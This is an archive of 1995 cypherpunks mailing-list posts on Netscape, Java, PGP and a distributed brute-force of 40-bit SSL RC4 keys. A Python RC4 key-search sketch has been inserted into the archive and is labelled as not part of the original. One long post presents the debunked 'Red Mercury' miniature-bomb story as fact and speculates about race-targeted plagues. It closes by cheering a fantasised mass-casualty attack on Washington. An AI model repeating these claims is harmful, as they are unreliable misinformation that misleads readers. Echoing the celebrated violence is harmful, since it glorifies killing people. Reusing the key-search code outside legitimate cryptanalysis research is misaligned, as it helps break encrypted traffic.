The problem is that existing operating environments do not, in
general, provide good facilities for the kind of tight integration you
really want.

Besides, there is nothing wrong with a monolithic application, as long
as it provides a sufficiently rich extension language.  Take Emacs,
for example.  Emacs is a monolithic application, but I use different
Lisp packages to read news, handle mail, and develop software.  (I
occasionally even just edit text.)

Moreover, I have co-authored a Lisp package to hook PGP functions into
*every* Emacs mail and news package, without ever talking to the
authors of those packages.  In general, any package can be written to
seamlessly integrate with any other.  In addition, all of these
packages work without modification on every variant of Unix, on VMS,
on Windows NT, and sometimes even on DOS.  I can write in beautiful
(and safe) Lisp, and let the Emacs maintainers worry about the
idiosyncrasies of each operating system.

The problem with Netscape currently is that all of their packages are
*built in* by Netscape Communications.  That is why they have no mail
handler, and why their news reader sucks, and why it is impossible for
any of us to fix these things or add a PGP front end.

Java looks somewhat promising; with it, perhaps Netscape can become a
platform-independent system for writing packages to manipulate and
display hypertext.  It would be like an Emacs for hypertext, but with
a crufty extension syntax and no source code.  And a user base 1000
times as large...

 pfarrell> Microsoft has been preaching the use of OLE and component
 pfarrell> programs as its development vision for 2+ years, Macs have
 pfarrell> been popular for ten years, why is the trend still towards
 pfarrell> adding every possible bell and whistle to single programs?

These approaches suffer for two reasons.  First, it's a pain to
incorporate the same basic display code into every package.  Second,
it's a pain to rewrite the same basic display code for every window
system.  (Especially when "every window system" means Microsoft,
Macintosh, and X.)  Other subsystems than display have similar
problems (networking comes to mind), but I think display is the major
pain in the groin.

What Netscape could do is provide the engine for hypertext display,
with a sufficiently rich and simple extension language that it would
be easy to write new modules.  Someone would probably write a decent
news reader.  Someone else would write a mail handling package.
Someone else would write a PGP interface.  And so on.  Netscape would
need to provide other functions across platforms, like TCP sockets,
but that isn't impossible: Emacs has done all of this (save graphical
display) for over a decade.

Gosh, we might find ourselves using 1980 technology by the year 2000.

I don't know enough about Netscape's plans for using Java to know
whether any of this is likely to happen.  I'm not even sure I want to
see it happen.  But it would be interesting.

Cheers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.3beta, an Emacs/PGP interface

-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 11:51:19 PDT
To: patl@lcs.mit.edu
Subject: Re: Netscape the Big Win
In-Reply-To: <199507201802.OAA22155@skyclad.lcs.mit.edu>
Message-ID: <199507201850.OAA06558@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


[extension languages] 
> Java looks somewhat promising; with it, perhaps Netscape can become a
> platform-independent system for writing packages to manipulate and
> display hypertext.  It would be like an Emacs for hypertext, but with
> a crufty extension syntax and no source code.  And a user base 1000
> times as large...

  The "crufty" extension syntax is a simplified and improved C++, with all
the features any lisp extension has, minus closures. For user interface
work, and applications existing in a larger environment, object 
oriented languages are superior. LambdaMOO shows lots of evidence for this.
Sun, by choosing a C++ syntax for Java, gains a tremendous advantage by
allowing C/C++ programmers to translate their experience to Java
programming rapidly. In fact, I wish Java had actually been the real
C++. C++ suffers from not having garbage collection, and from overreliance
on pointer manipulation. Now, if only someone can convince Sun to add
operator overloading to Java for the final release..... (really useful
for BigInt programming)

(netscape may not release source code, but the full source code to hotjava
is available)   
-Ray
  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 15:22:46 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
Message-ID: <v02120d3aac348d32ef0b@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Tim --

HotJava is a web browser that happens to be written in a language
called Java, that runs on top of the Java Virtual Machine, which
is part of what gives this combination of tools the high degree of
platform independence we've been talking about. JVM is the thing
that is currently being ported to different platforms both by Sun
and by others. Also, there is the Abstract Windowing Toolkit, which
provides a set of platform-independent, browser-embeddable GUI tools.

HotJava is the first (and certainly won't be the last) web browser
that allows you to have small Java programs (called applets) as an HTML
document type. These are obtained by the browser in the same way
it obtains a GIF, but they are interpreted and run on the client
machine. A Java program is compiled into Java bytecodes, which have
certain properties that prevent them from, say, breaking out of
their address space, playing cute games with the CPU, etc. Applets
are composed of bytecodes.

Most of the existing applets do stuff like 3D models you
can rotate with the mouse, irritating animations, and enhancements
to forms technology, but Java is a general-purpose language --
one of the most impressive applets I saw initially was a spreadsheet,
plonked down in the middle of a web page. Admittedly, it was a really
stupid spreadsheet, but it did a good job of convincing me that you
could really do anything with this stuff.

I don't get what you mean when you say, "Java isn't ready for the
home market." True, I don't think that programming languages of
any sort are part of the "home market", but I think that Java will
enable people like cypherpunks to write extremely portable applications
_once_ that will be embeddable on web pages viewed by browsers like
Netscape. I can't think of anything that is going to come closer to
your definition of "winning" the home market. Certainly the home
market will be dominated in short order by Win 95 and MacOS (mostly
the former.) I think the Win 95 port of the Java environment is only
awaiting release of Win 95, and the MacOS port has been demoed around town.

Also, Java is entirely orthogonal to issues like particular protocols
or formats, in the same sense that C or Smalltalk are orthogonal to
those same issues. It's just that we will be able to embed access to
those protocols and formats into the popular tools without huge
porting nightmares, or even requiring much cooperation from the
vendors themselves, who are often limited politically by what they
can put in themselves.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Thu, 20 Jul 95 15:42:05 PDT
To: cypherpunks@toad.com
Subject: It had to happen...
Message-ID: <v02120d3eac3499ebec14@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Has anyone caught this yet? From "No Such Agency" to having
their own Web page... wow.

http://www.nsa.gov:8080/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Andrew Roos" <ANDREWR@real3.realtime.co.za>
Date: Thu, 20 Jul 95 06:46:32 PDT
To: trei@process.com
Subject: Re: (Cracking) Netscape (is) the Big Win
Message-ID: <10AECF4554D@real3.realtime.co.za>
MIME-Version: 1.0
Content-Type: text/plain


Peter Trei says:

> This is why it's imperative for cpunks to work on the SSL challenge
> recently posted. Cracking 40 bit RC4 will provide a strong industry
> incentive to move towards stronger crypto standards, and to pressure
> the government to relax ITAR. 

The SSL project is at an advanced stage. I am regression testing 
the third (and, I hope, final) version of the SSL bruter, while Adam 
and others are working on the key distribution mechanism. It is 
important in a project of this nature that everything be thoroughly
tested before we start, so we don't waste thousands of hours of CPU 
time...
 
Andrew
___________________________________________________________________________

#!/usr/local/bin/perl -s-- -export-a-crypto-system-sig -RSA-in-3-lines-PERL
($k,$n)=@ARGV;$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%
Sa2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print pack('H*'
,$_)while read(STDIN,$m,($w=2*$d-1+length($n||die"$0 [-d] k n\n")&~1)/2)

Andrew Roos                                                 Realtime
                                                            PO Box 15170
                                                            Vlaeburg 8018
Phone: +27-21-244350                                        Cape Town
Fax:   +27-21-221507                                        South Africa
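
The message above stresses regression-testing the key search and dividing the work before any CPU time is spent. The following is an added sketch of that idea, not the project's bruter and not part of the original message: a self-checking, chunked search over a deliberately reduced RC4 keyspace, with a timing extrapolation to the full 40 bits. The function names, the sample record, and the use of the 5-byte key directly (rather than through SSL's key derivation) are assumptions made for illustration.

```python
import time

KEY_BYTES = 5  # 40-bit secret key, the export-grade size discussed above

# Constructed sample: a record whose first bytes the searcher already knows.
SAMPLE_RECORD = b"GET /index.html HTTP/1.0\r\n\r\n"
KNOWN_PREFIX = SAMPLE_RECORD[:8]


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4: key schedule, then XOR the keystream into data."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def key_from_int(k: int) -> bytes:
    """Map a keyspace index to a 5-byte key (big-endian)."""
    return k.to_bytes(KEY_BYTES, "big")


def chunks(space_bits: int, chunk_bits: int):
    """Split [0, 2**space_bits) into equal, non-overlapping work units."""
    size = 1 << min(chunk_bits, space_bits)
    for start in range(0, 1 << space_bits, size):
        yield start, start + size


def search_chunk(start: int, end: int, known_plain: bytes, ciphertext: bytes):
    """Return the key index in [start, end) matching the known plaintext, else None."""
    target = ciphertext[:len(known_plain)]
    for k in range(start, end):
        if rc4(key_from_int(k), known_plain) == target:
            return k
    return None


def regression_test(space_bits: int = 10, chunk_bits: int = 8) -> bool:
    """Check the cipher, the partitioning and the search before a long run."""
    # 1. The cipher must match a published RC4 test vector.
    assert rc4(b"Key", b"Plaintext").hex() == "bbf316e8d940af0ad3"
    # 2. Work units must tile the keyspace with no gaps or overlaps.
    units = list(chunks(space_bits, chunk_bits))
    assert units[0][0] == 0 and units[-1][1] == 1 << space_bits
    assert all(a[1] == b[0] for a, b in zip(units, units[1:]))
    # 3. Keys planted at unit edges must be found by exactly the owning unit.
    size = units[0][1]
    last = (1 << space_bits) - 1
    for planted in sorted({0, size - 1, min(size, last), last}):
        ct = rc4(key_from_int(planted), SAMPLE_RECORD)
        hits = [search_chunk(a, b, KNOWN_PREFIX, ct) for a, b in units]
        assert [h for h in hits if h is not None] == [planted]
        assert hits[planted // size] == planted
    return True


def measure_rate(trials: int = 2000) -> float:
    """Measured key trials per second for this implementation on this machine."""
    ct = rc4(key_from_int(0), SAMPLE_RECORD)
    t0 = time.perf_counter()
    search_chunk(1, 1 + trials, KNOWN_PREFIX, ct)  # key 0 is outside the range
    return trials / (time.perf_counter() - t0)


def worst_case_seconds(rate: float, bits: int = 40) -> float:
    """Time to exhaust a keyspace of the given size at the given trial rate."""
    return (1 << bits) / rate


if __name__ == "__main__":
    print("regression test passed:", regression_test())
    rate = measure_rate()
    days = worst_case_seconds(rate) / 86400
    print(f"{rate:,.0f} keys/s here; full 40-bit sweep: {days:,.0f} machine-days")
    print(f"spread over 1000 machines at this rate: {days / 1000:,.1f} days each")
```
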




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Salz <rsalz@osf.org>
Date: Thu, 20 Jul 95 12:50:10 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunk "Zen" victories
Message-ID: <9507201950.AA24205@sulphur.osf.org>
MIME-Version: 1.0
Content-Type: text/plain


The Boston Globe has a weekly "magazine review" column.  In yesterday's
column they wrote about the Rimm piece, Time's followup, how the Internet
got the story right, and fast, and how HotWired has a really good page
on it.  The column then reviewed the current Wired and said the magazine
is now behind the times.  In particular, contrasting it to the second(?)
issue, "when they covered the Cypherpunks (sic) and their privacy agenda."




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Thu, 20 Jul 95 13:28:20 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.950720161632.12511A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jul 1995, Timothy C. May wrote:
> There were reasons why some folks like to do as much work as they could in
> an integrated environment like Emacs, regardless of the underlying OS
> flavor. Many folk still do, and they read News, send mail, etc., all from
> within Emacs.
> 
> Same idea with Netscape...albeit with a different focus. And my guess,
> based on lots of indications, is that about a thousand times as many people
> will soon be doing this with Netscape as with Emacs, or elm, or pine, etc.
>
> Ray's comments about OpenDoc, HotJava, and other object-oriented tools fit
> this picture, I think.

Perhaps.  I went to a computer store the other day, and saw almost two 
dozen different packages for e-Space access, each with different 
software... 2 or 3 with netscape, 2 or 3 with mosaic, everything else 
just custom packages, mostly.

And from what I've heard about HotJava (not seen it yet, can't comment 
strongly) there needs another jump in PC power before it would be useful 
at the home level.  Part of why we were stuck with DOS for so long is 
that it was what got the job done when the revolution happened.  For that 
reason, I agree that HTML/Integrated browser solutions are what we're 
looking at, and at the same time don't have strong hopes for HotJava, 
though I would like to see it succeed.

> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
> technically superior and deserves to be as popular as Netscape and similar
> approaches, but reality is reality.

All dogmas are ultimately Bad Things.  But dogma gets stuff done in the 
short run.  NetScape deserves to be popular; they followed the truth that 
most PC users like "pretty" better.  And they made the best "pretty" 
software.

> (And I could be wrong on the way things will unfold. All I'm saying is that
> technology is a moving target, that plans have to change, and that ease of
> use will likely win out over technical sophistication. Folks who think the
> stronger technology will inevitably win should pick up a copy of a
> 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

Agreed.  It's still too early to tell.  This is like 100AD and we're 
trying to predict the Catholic Church of the twentieth century, trying to 
figure out fifteen years down our road.   I really believe that's how 
fast we're moving right now, and we have to hit as many targets as we can.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Thu, 20 Jul 95 13:28:17 PDT
To: monty.harder@famend.com (MONTY HARDER)
Subject: Re: Free The World Web Server project.. :)
In-Reply-To: <8AD9224.00030001F5.uuout@famend.com>
Message-ID: <9507202028.AA05535@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



MONTY HARDER writes:
>   After putting the appropriate tally mark on the sheet for the day's
> mail, and sending out the response letter, yep. I don't expect Jan Meyers
> to personally =ever= see my mail to her office. I only expect her
> gruntlings to put that mark under "no" for the ______ Bill.

You don't grok the "astroturf" concept. They'll note that letters look
too similar and discount them.

>   But "folx" is exactly the kind of thing that tells the staffer that it
> is =not= a form letter,

You are right -- indicates someone who thinks it makes them a K00L
D00D. I shan't say more.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Thu, 20 Jul 95 16:36:15 PDT
To: cypherpunks@toad.com
Subject: Re: DOVE/Red Mercury doom U.S. Super State?Red Mercury myth
Message-ID: <199507202335.QAA13609@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 20 Jul 1995, Gary Jeffers wrote:

>    Red Mercury means Antimony Mercury Oxide. This compound
> looks rather
> harmless but it is not. This compound is very technically
> difficult to

This myth shows up on sci.chem every few months or so.  There is no such 
thing.

-Rat




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joseph Block <jpb@shadow.net>
Date: Thu, 20 Jul 95 13:37:31 PDT
To: pfarrell@netcom.com
Subject: Re: Netscape the Big Win
In-Reply-To: <40697.pfarrell@netcom.com>
Message-ID: <199507202041.QAA21408@shadow.net>
MIME-Version: 1.0
Content-Type: text/plain


re:
> The current trend is to bundle all types of functionality into huge
> monolithic programs. Add mail to netscape, add encryption, add ...
[snip] 
> Why are all-in-one programs so preferable to using the windowing
> capabilities that are built into every X-window, Mac or Windows system?
> 
> Why not use the best mail client, another best webcrawler, and yet another
> news reader?
[snip] 
> With components, it wouldn't be hard to have a universal
> Encryption/Signature module. It would get around any proprietary
> restriction that vendors may or may not try to enforce ("can Netscape be
> extended or not" becomes moot).
> 
> Is clicking on another icon really too hard?

Um, that's what I do on my Mac.  The smoothness of Internet Config+Newswatcher
+IceTEE+Eudora+Anarchie is beautiful to watch - I command-click a URL while
reading mail and the right app magically takes care of everything.

[begin annoyed complaints here]

If only MacPGP were so easy.  MacPGP is such a pain in the ass for me that
I'm 90% done configuring a Linux box so I can sign/encrypt without hassle.
There are other planned uses for valkyrie, of course, but the triggering
factor is encryption.  I'd much rather keep PGP and my keys on my Duo that
I take everywhere, but that'd be too easy.

First I had troubles with it crashing my machine, then it wouldn't extract keys,
then it would extract keys but my buddy with the dos machine couldn't import
them (and yes, I had it set to ascii armor them).  The litany goes on and on.
I suspect that it is RamDoubler that MacPGP hates, but am unwilling to give it
up - I *need* that extra 12MB for work.

I'm not a moron; I got it working well enough under DOS to have taught
several friends to use it, it just doesn't like my Mac.

Does anyone have any information on when 3.0 is going to be released?  I'd
rather fight with a buggy new version than a buggy old version that will be
superseded RSN.

I'm also interested from an OpenDoc standpoint - I just got the OpenDoc DR2 CD
and would really like to make a PGP aware OpenDoc container.  I have time to
code now, but won't after September.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Thu, 20 Jul 95 13:45:51 PDT
To: tcmay@sensemedia.net (Timothy C. May)
Subject: Re: Netscape the Big Win
In-Reply-To: <ac3402ec0a0210046af5@[205.199.118.202]>
Message-ID: <199507202044.QAA14974@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


Tim May wrote:
> I am sorry that some folks heavily committed to the Linux route, or to
> Emacs, or to GNU/FSF, or to other approaches feel that their work is
> technically superior and deserves to be as popular as Netscape and similar
> approaches, but reality is reality.
> 
> (And I could be wrong on the way things will unfold. All I'm saying is that
> technology is a moving target, that plans have to change, and that ease of
> use will likely win out over technical sophistication. Folks who think the
> stronger technology will inevitably win should pick up a copy of a
> 15-year-old book called "The Soul of a New Machine," by Tracy Kidder.)

   I agree wholeheartedly with this. When General Magic first released
the Telescript white paper, I was really hot for the technology. I tried
to become a developer, I sent mail to every General Magic employee on the
net I saw posting (one guy even CC'ed me accidentally to his manager
saying they should hire me). I did searches in the media for any
mention of it. Harry Hawk even had dinner with the VP of Product Development
at General Magic. Alas, they would not give out alphas/betas of the 
development environment, which is all the same, because they don't know
how to market Telescript and make it a de facto standard. Instead of charging
for the interpreter/server, they should have given away the servers and
development stuff for free, or near free, and made their money by selling
services and clients (personal digital assistants using Magic Cap and
Telescript). The result is that no one uses Telescript except AT&T.
If I had gotten my hands on Telescript, I would have wasted lots of time
and effort on a failed product (failed in my eyes, because of its potential)
[lesson: proprietary programming languages fail unless they come embedded
within a killer consumer application]

    Then I got into Safe-Tcl, which is a little more promising, but still
a failure because there was no "killer app" which used it and which would
encourage its incorporation into other servers and clients. HTML would
have failed were it not for Mosaic. I was on the Web when it only had a line
mode browser and it was about as exciting as Gopher.

   I think Sun has taken the right approach with Java. Giving out Alphas
and Betas for free with source code. Encouraging heavy porting, and
incorporating it into a "killer app" (HotJava). They will make money
by licensing and selling tools and environments for Java, but their biggest
success will be that it will become the de facto "enabled content" language.

   Java still lacks what Telescript has (the ability to checkpoint execution
state and migrate execution across servers seamlessly), but what Telescript
has that Java doesn't isn't enough to make people wait for it, or pay
lots of money to be developers for.

   I could be wrong about how successful Java will be, but my confidence
factor is high.

-Ray



    





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Thu, 20 Jul 95 16:46:31 PDT
To: cypherpunks@toad.com
Subject: Re:  Java (was Netscape: the big win)
Message-ID: <199507202345.QAA16459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


So, what would be a "cypherpunk" thing you could do with Java?  I know
I can use it to download little applets to my system to do animations.
What can it do to enhance my privacy?  What would be the Java equivalent
of PGP?

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gjeffers@socketis.net (Gary Jeffers)
Date: Thu, 20 Jul 95 14:51:40 PDT
To: cypherpunks@toad.com
Subject: DOVE/Red Mercury doom U.S. Super State?
Message-ID: <199507202345.SAA24056@mail.socketis.net>
MIME-Version: 1.0
Content-Type: text/plain


            DOVE/Red Mercury dooms U.S. Super State?

   The first part of this post deals with Red Mercury. The remainder
deals generally with cheap weapons of mass destruction and their
proliferation among small groups.

   Red Mercury means Antimony Mercury Oxide. This compound looks rather
harmless but it is not. This compound is very technically difficult to
synthesize in its dangerous state. I suspect that the compound is more
complex than its formula suggests. According to Spin magazine, it is
not exactly an explosive but goes through a chemical transformation
that releases MUCH more power (energy/time) than high explosives. It was
discovered in Russia and is currently being produced there. DOVE is a
code name for an American device that would have used Red Mercury.

   The unique property of Red Mercury is that it releases so much power
that it can be used as a trigger for miniature fusion bombs! And
apparently has been.

   Most of this material is from a booklet by Dr. Gary North, called
BILLS FROM BEYOND THE GRAVE - chapter 7 - Khomeini's Bill. This booklet
is a recent promotional for North's REMNANT REVIEW.

Remnant Review
824 East Baltimore Street
Baltimore, MD
21202


The following text is mostly information quoted from North's booklet
in which he gets his info from Sam Cohen - The man who came up with
the idea of the neutron bomb in the late 1950's.

--------------------start  North------------------------------------
The DOVE project was active at least since 1958 at the Livermore nuclear
weapon laboratory. "The proposed device was part of the lab's peaceful
explosive program, e.g., underground drilling & exploration. It contained
no fissionable material. That is, it was not detonated by an atomic bomb.
It was to be composed of deuterium & tritium: heavy hydrogen which is
used in the hydrogen bomb. It would have the effect of 10 tons of TNT.
It would have been an extremely low-yield weapon."

   Cohen concluded that it would also serve as a weapon. It would kill
enemy troops with radiation out to several hundred yards, but without
the destruction of buildings and without serious radioactive
contamination. These devices, if practical, could be turned out by the
hundreds at very low nuclear cost, since they contained no fissionable
material. Here was a completely different approach to neutron bombs.

   Not long after, he told a key Presidential advisor about it. This man
has been a high-level advisor in the field of nuclear disarmament for
half a century. The man understood the problem: if such a weapon could
be built, any nuclear-proliferation treaty would become unenforceable -
a nightmare in his view. As Cohen told me, shortly thereafter he was
forbidden access to this project, which the government killed by 1960.

   Meanwhile, the Soviet Union's research program continued. Even before
Liverpool began its research, the USSR had been involved in a similar
project. A 1957 paper by a Soviet weapon designer described experiments
done in 1952. In 1961, a Soviet colonel described in Red Star the
military effects of such devices. Cohen realized that the Soviets were
not talking about DOVE; they were developing it.

   Now jump ahead about three decades. In 1992, Russian General
Ye Negin stated that Russia had begun producing low-yield nuclear
devices, but double what previous tactical nuclear weapons have been.
He stated that this had been accomplished with a hundredfold reduction
in weight. Cohen cites a 1990 statement by Viktor Mikhailov, who is now
the Russian Minister of Atomic Energy: "You can drop a couple of hundred
little bombs on foreign territory, the enemy is devastated, but for
the aggressor there are no consequences."

   This means the Soviets - now called Russians - developed the
long-missing trigger: the detonation technology. Cohen calls this new
material Red Mercury: an antimony, mercury oxide. But U.S. intelligence
services have officially denied that any relevant evidence for such a
device exists. Remember this rule: "No rumor should be considered true
till it's denied."

                A NEUTRON BOMB IN A LUNCH SACK

   In my interview with Cohen, he described eating his lunch in the park
across the street from the White House, just a few hundred yards away.
If a tritium-based, red-mercury detonated device exists, he speculated,
it would weigh perhaps five pounds. A person could sit down on a park
bench, casually eat his lunch (or pretend to), deposit the lunch sack in
a trash can, and walk away. At some predetermined moment, the bomb would
explode. Everyone above ground in the White House would be killed. So
would most people within several hundred yards of the explosion in every
direction.

   His other scenario is similar: a brown paper bag deposited between the
two World Trade buildings in New York City. Tens of thousands of people
could die.

   The issue here is terrorism. These devices could be tested in
underground facilities. They would give off no detectable radiation above
ground when exploded. Their low-level explosive force could not be
monitored. The killing power of these devices is not in the force of the
explosion. It is the neutrons that do the damage. They also blow out
computers: electromagnetic pulsation (EMP).

   Because they are very light and undetectable, these devices could be
smuggled easily across a border. Hide one in a coffee can.

   How cheaply could they be produced? Cohen cannot be sure since he does
not know the precise nature of the detonating mechanism. But even at the
cost of $1 million or more, this would be irrelevant compared with the
consequences. A DOVE is a cheap weapon.

            THE GOVERNMENT HAS TO DENY THIS STORY

   The government faces two problems. (1) The 1968 Non-Proliferation
Treaty does not deal with tritium. It deals only with fissionable
materials, e.g. plutonium. (2) The Anti-Ballistic Missile (ABM) defense
treaty is now threatened. By exploding a DOVE-type weapon in the
atmosphere, a defensive-minded nation could disrupt incoming nuclear
missiles. When detonated, these DOVE devices give off virtually no
detectable radiation: no fissionable material. Any terrorist nation
could test such a device, and the West would not know about it. This
means that the two key nuclear war-related treaties of the U.S. are
technologically dead. They can be violated at will. The State Department
dares not admit this.
---------------------------end North--------------------------------

   North thinks that Iran will be the country that attacks the U.S.
with these bombs.






SOME MORE REFERENCES TO RED MERCURY

---------------------start------------------------------------------
Fool's mercury. (synthesized red mercury created by Promecologia)
The Economist, May 22, 1993 v327 n7812 p76(1).

Abstract: Promecologia claims to be able to synthesize red mercury, and
it has a $24.2 billion deal to sell the mercury to API International.
But this deal has gone awry, because of accusations that the sale is
only an attempt to launder money.

Companies: Promecologia - Contracts
API International - Contracts

AN: 13768250
-------------------------end--------------------------------------

----------------------------start----------------------------------
... But only fools still hunt for elusive red mercury.
New Scientist, June 06, 1992 v134 n1824 p10(1).

Author: William Brown

Subjects: Mercury compounds - Reports Fraud in science - Reports

Gov't Agencies: United States. Department of Energy - Reports

AN: 12747905
(This may be a disinformation article. Gary Jeffers)
--------------------------end------------------------------------

--------------------------start---------------------------------
Black holes of red mercury. (views of Gennady Brubulis, retired
State Secretary)

Moscow News, August 13, 1993 n33 p11(1).

Author: Vladimir Orlov

Abstract: The existence of "red mercury," a mercury antimonite that is
produced and exported by the USSR to countries such as the US, France,
and Iraq for use in the manufacturing of nuclear weapons, is
investigated and analyzed. The substance is a brownish-steel power or a
red liquid, and costs between 320 and 380 dollars per gram. Russian
chemists and other specialists in the US Department of Energy have
denied the existence of this substance.

Subjects: Mercury - Research

AN: 14519163
(It's probable that this article is in English. Gary Jeffers)
------------------------------end------------------------------------

An article titled Red Mercury was printed in (I'm pretty sure)
Spin magazine some time ago.


From WAR AND ANTI-WAR by Alvin and Heidi Toffler - Warner Books

----------------------Start------------------------------------------

               WALL STREET AND WARLORDS

   All this leads some pessimists to doubt that nuclear arms can be
controlled at all. Few match the gloom of Carl Builder, a strategic
analyst at the RAND Corporation. Builder's pessimism is regarded as
extreme by many of his colleagues, but as the first director of nuclear
safeguards for the U.S. Nuclear Regulatory Commission, he can hardly be
dismissed. At one time Builder was totally responsible for the security
of all nuclear materials in civilian hands in the United States, some of
it bomb-grade stuff.

   The main problems of the future, he believes, will not arise from
nation-states at all, but from those we called "global gladiators" in
our book POWER SHIFT. These are terror organizations, religious
movements, corporations, and other nonnational forces - many of whom, he
says could gain access to nuclear weaponry.

   Listening to him one imagines the Irish Republican Army announcing
that it has acquired its own nuclear bomb. A call to the BBC warns that
"if British troops do not evacuate Northern Ireland within seventy-two
hours, a nuclear device will..."  The bumblers who devastated parts
of New York's World Trade Center might have obliterated Wall Street had
someone cleverer supplied them with a tactical nuke. Someday, Builder
believes, even outfits like the Medellin cocaine cartel may be able to
build their own nuclear weapons.

   According to a report in The Economist, "There have already been more
than 50 attempts to extort money from America with nuclear threats, some
frighteningly credible."  Worse yet, to the current list of possible
threats an additional one, largely overlooked, now has to be added. Not
only governments, terrorists, and drug barons, but warlords may now be
searching for nuclear weapons.

   There are, often ignored by the arms-control community, private armies
in many parts of the world under the control of local
business-cum-political thugs. The equivalent of warlords can be found
from the Philippines to Somalia and the Caucasus, wherever central
government control is weak. More and more of these private armies are
springing up as the national forces of the old Soviet Union disintegrate.
Moreover, there are reasons to believe that mafia-like business groups in
Russia today, feed, house, clothe, and control whole units of the former
Red Army. In short, private armies, mercenaries, and First Wave
warlordism are all making a comeback. The idea of nuclear weapons under
the control of these local generalissimos should send a shudder down our
collective spine.

   Builder's proliferation scenario, however, forces us to confront the
extreme. Like gunpowder, he says, "Nuclear weapons are going to diffuse..
I'm going to go even further and say, even if not in my lifetime,
perhaps, but in the foreseeable future, [that they] are going to
proliferate down to individuals. It will be possible for an individual
to make a nuclear device from materials which are in commerce."

   Mafia families, Branch Davidian cultists, archaeo-Trotskyite
groupuscules, Sendero Luminoso Maoists, Somalian or Southeast Asian
warlords, Serbian Nazis, and even, perhaps, individual loonies could hold
whole nations at ransom. Worse yet, Builder believes, "An opponent cannot
be deterred by the threat of nuclear weapons if that opponent has no
definable society to threaten." Thus, he says, a "terrifying asymmetry"
looms ahead.
--------------end of WAR AND ANTIWAR-----------------------------------

   Another threat is cheap biological warfare. A few years ago in a
popular science magazine, a scientist was describing the near future
threat of biological weapons. Among the things he stated was 1. while
only two sites in the world house smallpox samples, its genome is known
and it can be made in a gene sequencer. 2. As bio science advances,
plagues can be manufactured by smaller groups of people. 3. A plague
could be tailored to strike only a certain racial group in only a
particular part of the world. The part of the world described by
humidity, temp., climate, etc.

                       CONCLUSION

   The world is not going to be dominated by a one world state.
Technology dictates that weapons of mass destruction are going to find
their way into the hands of smaller and smaller groups. No longer will
giant states be able to say "you do what I say." Sort of a "Don't tread
on me" world. "God created man. Samuel Colt made men equal." - AND cheap
weapons of mass destruction will make political entities equal
regardless of size.

  Other books that pretty much reach these conclusions are: The
GREAT RECKONING by James Dale Davidson and Lord William Rees-Mogg
Simon & Schuster; BLOOD IN THE STREETS by same writers;
and BASEMENT NUKES by Erwin S. Strauss - Loompanics Unlimited.

Relevance to CYPHERPUNKS: Weaponry decides size of viable independent
political groups & their degree of independence. This will decide much
of the nature of private communications. Also, Cypherpunks was sort of
down about the increasing control of the U.S. superstate. I think this
will cheer them up.

& Finally: In the old Feudal days, wars weren't so bad. The nobility
would fight while the peasants watched nearby & cheered the sport.
Won't it be just grand when we sit in front of our tv's with cherry
cokes & popcorn & watch the "horrible" news reports of the destruction
in Washington D.C. in which the dreaded two-headed Clinton monster was
killed and various paramilitary headquarters, the IRS, Congress,
lobbyists, lawyers, the Federal Reserve and a violent welfare population
were destroyed. Set VCRs on record!

                                             PUSH EM BACK! PUSH EM BACK!
                                             WWWAAAYYY BBBAAACCCK!
                                             BBBEEEAAATTTT STATE!
                                             Gary Jeffers







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
